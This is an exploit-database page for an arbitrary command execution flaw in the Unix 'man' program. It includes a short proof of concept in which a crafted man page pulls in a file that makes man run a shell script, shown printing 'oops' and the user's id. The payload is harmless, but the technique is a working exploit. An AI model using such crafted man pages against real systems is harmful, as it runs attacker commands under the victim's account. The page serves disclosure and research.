header-logo
Suggest Exploit
vendor:
man
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: man
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:man:man
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

man program Arbitrary Command Execution Vulnerability

The man program does not properly handle certain types of input. An attacker can exploit this vulnerability by creating a malicious man page that executes arbitrary commands when processed by the program.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7066/info

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$

Navigation

Suggest Exploit

Services By CQR